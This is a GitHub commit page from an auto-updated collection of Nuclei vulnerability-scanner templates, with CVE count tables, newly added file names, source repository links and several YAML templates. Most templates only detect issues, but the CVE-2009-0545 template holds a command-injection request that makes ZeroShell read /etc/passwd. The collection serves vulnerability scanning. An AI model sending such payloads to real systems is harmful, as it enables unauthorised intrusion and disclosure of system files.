Skip to content

Commit

Permalink
Auto Updated
Browse files Browse the repository at this point in the history
  • Loading branch information
test committed Aug 28, 2024
1 parent d1f8a67 commit dfd6778
Show file tree
Hide file tree
Showing 3,693 changed files with 366,594 additions and 68,517 deletions.
The diff you're trying to view is too large. We only load the first 3000 changed files.
73 changes: 61 additions & 12 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -20,21 +20,70 @@
| CVE-2016 | 249 |
| CVE-2017 | 395 |
| CVE-2018 | 445 |
| CVE-2019 | 512 |
| CVE-2020 | 592 |
| CVE-2021 | 1733 |
| CVE-2019 | 513 |
| CVE-2020 | 591 |
| CVE-2021 | 1731 |
| CVE-2022 | 2462 |
| CVE-2023 | 4747 |
| CVE-2024 | 4733 |
| Other | 23846 |
| CVE-2023 | 4749 |
| CVE-2024 | 4759 |
| Other | 23866 |
## 近几天数量变化情况
|2024-08-21 | 2024-08-22 | 2024-08-23 | 2024-08-24 | 2024-08-25 | 2024-08-26 | 2024-08-27|
|2024-08-22 | 2024-08-23 | 2024-08-24 | 2024-08-25 | 2024-08-26 | 2024-08-27 | 2024-08-28|
|--- | ------ | ------ | ------ | ------ | ------ | ---|
|41281 | 41305 | 41313 | 41401 | 41421 | 41432 | 41435|
|41305 | 41313 | 41401 | 41421 | 41432 | 41435 | 41481|
## 最近新增文件
| templates name |
| --- |
| xui-default-login.yaml |
| cookie-consent-detection.yaml |
| anything-llm.yaml |
| CVE-2024-6842.yaml |
| ilc-thickbox.yaml |
| Square-oauth-secret.yaml |
| Sendgrid-api.yaml |
| umbraco-delivery-api.yaml |
| blogintroduction-wordpress-plugin.yaml |
| mm-breaking-news.yaml |
| Pictatic-API-key.yaml |
| misiek-photo-album.yaml |
| malwared-byob.yaml |
| music-request-manager.yaml |
| couchdb-default-login.yaml |
| visual-sound.yaml |
| reviews-feed.yaml |
| Square-access-token.yaml |
| simple-headline-rotator.yaml |
| azindex.yaml |
| malwared-byob-rce.yaml |
| gixaw-chat.yaml |
| Shopify-token.yaml |
| rundeck-default-login.yaml |
| pocket-widget.yaml |
| quick-code.yaml |
| misiek-paypal.yaml |
| wccp-pro.yaml |
| jellyfin-default-login.yaml |
| CVE-2023-46818.yaml |
| CVE-2024-5827.yaml |
| CVE-2024-7818.yaml |
| CVE-2024-8197.yaml |
| CVE-2024-7687.yaml |
| CVE-2024-7820.yaml |
| CVE-2024-7860.yaml |
| CVE-2024-8046.yaml |
| CVE-2024-6019.yaml |
| CVE-2024-6017.yaml |
| CVE-2024-7817.yaml |
| CVE-2024-7688.yaml |
| CVE-2024-6690.yaml |
| CVE-2024-7918.yaml |
| CVE-2024-8054.yaml |
| CVE-2024-7791.yaml |
| CVE-2024-7304.yaml |
| CVE-2024-6804.yaml |
| CVE-2024-7822.yaml |
| CVE-2024-8199.yaml |
| CVE-2024-6688.yaml |
| CVE-2024-6018.yaml |
| CVE-2024-7861.yaml |
| CVE-2024-8056.yaml |
| CVE-2024-7862.yaml |
| CVE-2024-7816.yaml |
| CVE-2024-8200.yaml |
| CVE-2024-6693.yaml |
3 changes: 2 additions & 1 deletion data.json
Original file line number Diff line number Diff line change
Expand Up @@ -171,5 +171,6 @@
"2024-08-24": 41401,
"2024-08-25": 41421,
"2024-08-26": 41432,
"2024-08-27": 41435
"2024-08-27": 41435,
"2024-08-28": 41481
}
55 changes: 54 additions & 1 deletion data1.json
Original file line number Diff line number Diff line change
Expand Up @@ -49033,5 +49033,58 @@
"xui-default-login.yaml": "2024-08-27 02:16:21",
"cookie-consent-detection.yaml": "2024-08-27 02:16:21",
"anything-llm.yaml": "2024-08-27 02:16:21",
"CVE-2024-6842.yaml": "2024-08-27 02:16:21"
"CVE-2024-6842.yaml": "2024-08-27 02:16:21",
"ilc-thickbox.yaml": "2024-08-28 02:17:54",
"Square-oauth-secret.yaml": "2024-08-28 02:17:54",
"Sendgrid-api.yaml": "2024-08-28 02:17:54",
"umbraco-delivery-api.yaml": "2024-08-28 02:17:54",
"blogintroduction-wordpress-plugin.yaml": "2024-08-28 02:17:54",
"mm-breaking-news.yaml": "2024-08-28 02:17:54",
"Pictatic-API-key.yaml": "2024-08-28 02:17:54",
"misiek-photo-album.yaml": "2024-08-28 02:17:54",
"malwared-byob.yaml": "2024-08-28 02:17:54",
"music-request-manager.yaml": "2024-08-28 02:17:54",
"couchdb-default-login.yaml": "2024-08-28 02:17:54",
"visual-sound.yaml": "2024-08-28 02:17:54",
"reviews-feed.yaml": "2024-08-28 02:17:54",
"Square-access-token.yaml": "2024-08-28 02:17:54",
"simple-headline-rotator.yaml": "2024-08-28 02:17:54",
"azindex.yaml": "2024-08-28 02:17:54",
"malwared-byob-rce.yaml": "2024-08-28 02:17:54",
"gixaw-chat.yaml": "2024-08-28 02:17:54",
"Shopify-token.yaml": "2024-08-28 02:17:54",
"rundeck-default-login.yaml": "2024-08-28 02:17:54",
"pocket-widget.yaml": "2024-08-28 02:17:54",
"quick-code.yaml": "2024-08-28 02:17:54",
"misiek-paypal.yaml": "2024-08-28 02:17:54",
"wccp-pro.yaml": "2024-08-28 02:17:54",
"jellyfin-default-login.yaml": "2024-08-28 02:17:54",
"CVE-2023-46818.yaml": "2024-08-28 02:17:54",
"CVE-2024-5827.yaml": "2024-08-28 02:17:54",
"CVE-2024-7818.yaml": "2024-08-28 02:17:54",
"CVE-2024-8197.yaml": "2024-08-28 02:17:54",
"CVE-2024-7687.yaml": "2024-08-28 02:17:54",
"CVE-2024-7820.yaml": "2024-08-28 02:17:54",
"CVE-2024-7860.yaml": "2024-08-28 02:17:54",
"CVE-2024-8046.yaml": "2024-08-28 02:17:54",
"CVE-2024-6019.yaml": "2024-08-28 02:17:54",
"CVE-2024-6017.yaml": "2024-08-28 02:17:54",
"CVE-2024-7817.yaml": "2024-08-28 02:17:54",
"CVE-2024-7688.yaml": "2024-08-28 02:17:54",
"CVE-2024-6690.yaml": "2024-08-28 02:17:54",
"CVE-2024-7918.yaml": "2024-08-28 02:17:54",
"CVE-2024-8054.yaml": "2024-08-28 02:17:54",
"CVE-2024-7791.yaml": "2024-08-28 02:17:54",
"CVE-2024-7304.yaml": "2024-08-28 02:17:54",
"CVE-2024-6804.yaml": "2024-08-28 02:17:54",
"CVE-2024-7822.yaml": "2024-08-28 02:17:54",
"CVE-2024-8199.yaml": "2024-08-28 02:17:54",
"CVE-2024-6688.yaml": "2024-08-28 02:17:54",
"CVE-2024-6018.yaml": "2024-08-28 02:17:54",
"CVE-2024-7861.yaml": "2024-08-28 02:17:54",
"CVE-2024-8056.yaml": "2024-08-28 02:17:54",
"CVE-2024-7862.yaml": "2024-08-28 02:17:54",
"CVE-2024-7816.yaml": "2024-08-28 02:17:54",
"CVE-2024-8200.yaml": "2024-08-28 02:17:54",
"CVE-2024-6693.yaml": "2024-08-28 02:17:54"
}
5 changes: 5 additions & 0 deletions links.csv
Original file line number Diff line number Diff line change
Expand Up @@ -444,3 +444,8 @@ https://github.com/vaampz/priv8-Nuclei
https://github.com/Unrealisedd/nuclei-templates
https://github.com/smn666/Nuclei_templates_2024
https://github.com/juanschallibaum/CVE-2024-38473-Nuclei-Template
https://github.com/emanueldosreis/CVE-2024-38856
https://github.com/stvnhrlnd/umbraco-nuclei-templates
https://github.com/jhonnybonny/nuclei-templates
https://github.com/fa-rrel/Nuclei-templates-xd
https://github.com/Kuray12/prv8_nuclei_templates
32 changes: 32 additions & 0 deletions nuclei-templates/CVE-2000/CVE-2000-0114.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,32 @@
id: CVE-2000-0114

info:
name: Microsoft FrontPage Extensions Check (shtml.dll)
author: r3naissance
severity: low
description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2000-0114
- https://www.exploit-db.com/exploits/19897
classification:
cve-id: CVE-2000-0114
remediation: Upgrade to the latest version.
tags: cve,cve2000,frontpage,microsoft,edb

requests:
- method: GET
path:
- '{{BaseURL}}/_vti_inf.html'

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
part: body
words:
- "_vti_bin/shtml.dll"

# Enhanced by mp on 2022/01/27
32 changes: 0 additions & 32 deletions nuclei-templates/CVE-2000/cve-2000-0114.yaml

This file was deleted.

26 changes: 26 additions & 0 deletions nuclei-templates/CVE-2001/CVE-2001-1473.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,26 @@
id: CVE-2001-1473
info:
name: Deprecated SSHv1 Protocol Detection
author: iamthefrogy
severity: high
tags: cve,cve2001,network,ssh,openssh
description: SSHv1 is deprecated and has known cryptographic issues.
remediation: Upgrade to SSH 2.4 or later.
reference:
- https://www.kb.cert.org/vuls/id/684820
- https://nvd.nist.gov/vuln/detail/CVE-2001-1473
classification:
cvss-score: 7.4
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
cve-id: CVE-2001-1473
cwe-id: CWE-310
network:
- host:
- "{{Hostname}}"
- "{{Host}}:22"
matchers:
- type: word
words:
- "SSH-1"

# Updated by Chris on 2022/01/21
26 changes: 0 additions & 26 deletions nuclei-templates/CVE-2001/cve-2001-1473.yaml

This file was deleted.

33 changes: 33 additions & 0 deletions nuclei-templates/CVE-2005/CVE-2005-2428.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,33 @@
id: CVE-2005-2428
info:
name: Lotus Domino R5 and R6 WebMail Default Configuration Information Disclosure
author: CasperGN
severity: medium
tags: cve,cve2005,domino
description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696).
remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files.
reference:
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
- https://www.exploit-db.com/exploits/39495
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2005-2428
cwe-id: CWE-200

requests:
- method: GET
path:
- "{{BaseURL}}/names.nsf/People?OpenView"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
name: domino-username
regex:
- '(<a href="/names\.nsf/[0-9a-z\/]+\?OpenDocument)'
part: body

# Enhanced by mp on 2022/02/02
25 changes: 0 additions & 25 deletions nuclei-templates/CVE-2005/cve-2005-2428.yaml

This file was deleted.

19 changes: 0 additions & 19 deletions nuclei-templates/CVE-2009/CVE-2009-0545.yaml

This file was deleted.

28 changes: 28 additions & 0 deletions nuclei-templates/CVE-2009/cve-2009-0545.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,28 @@
id: CVE-2009-0545

info:
name: ZeroShell <= 1.0beta11 Remote Code Execution
author: geeknik
severity: critical
description: ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action.
reference:
- https://www.exploit-db.com/exploits/8023
- https://nvd.nist.gov/vuln/detail/CVE-2009-0545
- http://www.zeroshell.net/eng/announcements/
- http://www.ikkisoft.com/stuff/LC-2009-01.txt
classification:
cve-id: CVE-2009-0545
tags: cve,cve2009,zeroshell,kerbynet,rce

requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22"

matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"

# Enhanced by mp on 2022/04/18
Loading

0 comments on commit dfd6778

Please sign in to comment.